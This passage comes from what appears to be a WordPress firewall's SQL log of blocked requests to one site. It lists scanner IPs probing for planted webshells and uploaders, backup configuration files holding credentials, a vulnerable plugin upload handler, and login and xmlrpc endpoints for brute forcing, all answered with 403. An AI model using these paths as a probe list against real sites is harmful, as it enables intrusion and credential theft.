Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tX3uU5ZnBagOrCY0mpMS68Ac',0,1665123987.9173,353,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DJdmRnCSHih5tQs3xvEpofkT',0,1665123994.6347,362,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O4XC0jyKpFhEbABoVTY9HJ6Z',0,1665124000.3995,2585,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2BkyfaROG8NuKVLADYC5Trxb',0,1665124009.1297,288,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fJOETinIS5KBHcLUgxA9h6jo',0,1665124019.3974,311,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','I3dsOEoc2L8JknxuliCgwDfq',0,1665124025.2375,314,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hINCVqtXAjiH956m8faTpQgL',0,1665124026.9099,323,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kRCMmxEhPVwH5JUsAjOb6BIe',0,1665124050.1444,7806,'','POST',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8DBv1VSlzJkFU6wQh7oe5H2d',0,1665124062.8008,308,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WeY1TNjfSBo9kRzp532ZmKHA',0,1665124081.2047,319,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qEv4wCbDGYIsxNcrAjaFop29',0,1665124085.6366,307,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pXhblW8HjUr15Js6qRkf9dIi',0,1665124106.9507,1668,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','eUvIYPVT1yn4DqfgS8Fm2M9x',0,1665124123.8499,331,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','N9TP3281CEFhSXaRWwdBYkfm',0,1665124141.2218,1100,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fVvaQGrbstLFeUIzc2g8JZhD',0,1665124147.5098,342,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Jy2MrxnVqmUIeQwzsXS3TZ4R',0,1665124152.3498,380,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','k7GIKExDRrjU934O1mnBwSWg',0,1665124175.0541,279,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FIWGNajLbxBYQqP2XiHV7UDO',0,1665124178.2067,289,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yBHWXgvR2Q8rY6wblx0MIAnu',0,1665124182.5152,293,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1vo2t6RWrkmzdKPy07MexHsh',0,1665124189.4536,299,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7eKzZ0bgRQcyF59uSBW3xJCE',0,1665124193.7394,323,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QWfMbyYxc647ho0PtZKSHJwR',0,1665124197.4996,323,'','GET',403,0,700,0,1,'',0),('3.110.180.235',57586923,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UubxtJ0p128NYlwvQqTc7jsr',0,1665124280.1090,13883,'','POST',403,0,515,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nuiYBpKm9ClVtErjIO5WGUxM',0,1665124611.6416,18740,'','POST',403,0,515,0,1,'',0),('167.172.67.151',2813084567,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Um5DMKH9VY7tXdg8FkcyQSxn',0,1665124947.2222,18425,'','POST',403,0,515,0,1,'',0),('137.184.124.136',2310569096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','6FIljyxsA7pknCoZNrbKf9Om',0,1665125161.7702,1477,'','POST',403,0,600,0,1,'',0),('198.46.85.155',3324925339,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','0eyVFBIoN18TRl6sPxWLDiYj',0,1665125206.8307,1160,'','POST',403,0,600,0,1,'',0),('103.160.37.174',1738548654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','asSOxGMp0X2iQFmcdC9KBWej',0,1665125277.5671,1170,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LZMqKYjUixvbpP2neuySkAah',0,1665125643.5892,19678,'','POST',403,0,515,0,1,'',0),('137.63.71.51',2302625587,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HtYzxy1q3E8USbuGW4FkPieX',0,1665125862.4941,5122,'','POST',403,0,515,0,1,'',0),('114.132.250.235',1921317611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Am1yf0CSFpzYsLirDK6h75Ug',0,1665125971.4018,1325,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-admin/css/colors/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','er6CdQtfaso2hqlnbFgy7ukW',0,1665140882.8117,347,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-admin/css/colors/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','z9cFkY7nOGSJZDil1LX3WgUw',0,1665140883.8813,322,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','gY1K7kyV5fz40TCwIBJXolMt',0,1665140885.1977,324,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TB802k4GUzruEevtcF9N6VOH',0,1665140886.2484,325,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','NGRySUt3LvIFmDlM26Ad4snx',0,1665140887.3605,321,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OLYsTJxD5NvGFrZBinqMRXgI',0,1665140888.4946,365,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-admin/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','AtZKIquy3cLRGQYmPTr0BS2C',0,1665140890.6195,329,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-admin/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0GFqXxj1iVAfMQTb5UrI6NP4',0,1665140891.7694,283,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','fOw53yHd2lVrXsucomT8JDKI',0,1665140892.7382,306,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ReJbGyFDnvMmsWo0OaUhwfHP',0,1665140893.8033,307,'','POST',403,0,700,0,1,'',0),('5.101.156.45',90545197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iDJnw7dgHY82A04VcSWBUeGE',0,1665140930.4018,523,'','POST',403,0,600,0,1,'',0),('107.167.244.67',1806169155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wjsWIxQ9Vbhq8O6tnvR4JiUF',0,1665141354.7783,18614,'','POST',403,0,515,0,1,'',0),('13.237.121.70',233666886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','t75GdiOe3XHQsDkyqrLI9aVn',0,1665141890.3766,491,'','POST',403,0,600,0,1,'',0),('199.249.230.7',3355043335,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wMJvOzBNxXSI4tfLAoecdqDC',0,1665142654.5623,19746,'','POST',403,0,515,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V6GHCeqJatds1olB7KLIxUAj',0,1665142879.0302,462,'','POST',403,0,600,0,1,'',0),('137.184.132.157',2310571165,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ejHDvBrXmLtAnCF7aUIl4g9w',0,1665143849.8038,2091,'','POST',403,0,600,0,1,'',0),('138.68.180.230',2319758566,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','7VHdu8gaqeoFwAjrvcT3CyKS',0,1665197058.1893,17448,'','POST',403,0,600,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DLUQcsxv06t4SCeMYPbdHjJG',0,1665249207.8444,285,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N94rRIoUCLgqY6QEnmuBfPtT',0,1665249212.0598,293,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AI5XwvaZS8NVs61BQD2LkOzm',0,1665249218.8196,289,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DeozFTBaINhJ4Wg95Q3kKSYv',0,1665249222.4867,284,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zdX6RIPr1cxHh0YK3WZNSbw9',0,1665249226.4865,284,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VTer0Mc8ZPOblHWuRonXYIfU',0,1665249229.5720,466,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RCNxiEf14K02SQljFHrIyU5a',0,1665249232.5079,292,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','g8NfuPrbt2lCTsRL95YxmF7Q',0,1665249242.3920,283,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f5X9DEiaLAx4sMVOGKk8UutF',0,1665249247.2847,308,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HuGdg9v42jMtUINPlXJADOmx',0,1665249248.3743,355,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hfZ8AMP7Gb9nUlyoCrKsvJ3T',0,1665249251.6386,336,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/public/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hCQ5Es7oP3ga2JSWw4j6OqUf',0,1665249254.0779,304,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZmhFQDHetSNrJ6y0pkx2bn5E',0,1665249257.2841,294,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','onxiKI8wTEGNPrOSgvmJyjdc',0,1665249260.8667,299,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','R9Lp3Kua7zJHZfDGMotCqiSk',0,1665249264.4408,274,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CfjMSxkOuQ7bvrFh4wV29z5I',0,1665249266.4950,321,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pDghXWnv08ZAMYKTmCH3kOVu',0,1665249269.0052,314,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/sh.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ANCZVT2rbqlHogKMnjs5aIeL',0,1665249274.4248,275,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XgkFe5lswaSmGO67fLhZbEuB',0,1665249278.4872,323,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I1Nb0oTjq3flAiEXnPrM2tJL',0,1665249282.1565,287,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iah1LoUDvm35qSCW7XRVw2Ae',0,1665249285.7087,283,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','P1kb3RVjY4tJcqNW6sdoaDKL',0,1665249289.9277,342,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r1O4cpVJChMUwG6nuHLdoi5s',0,1665249294.5995,282,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uy1mDWFYn0Ps7tpfZQaqA5iG',0,1665249297.9227,285,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9VN1MdobsxOH0qYtPkmTA8z7',0,1665249303.5500,441,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/uploads/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qYbKoN125eLSCsBiITd7rhXy',0,1665249307.3231,306,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','igmv8BJAkOPywt5ZheNbWaIz',0,1665249313.9200,301,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yiRM9rbkj7gOL2h5DvqxNTYC',0,1665249316.3713,282,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KlfHBZMu7Lz3e4npXyCbcY6o',0,1665249323.2888,279,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/w3llstore.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w86XkySNFbAsLj2d4WeIGYvq',0,1665249325.5625,307,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5cp8TRUHay7SBbiqtojAOQIm',0,1665249328.1433,294,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-admin/css/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nJ6d15fNP9HCyAwUEsDvYpFx',0,1665249331.3617,289,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Stk80poyHOPK9zIBQbEJlCiY',0,1665249335.2036,276,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 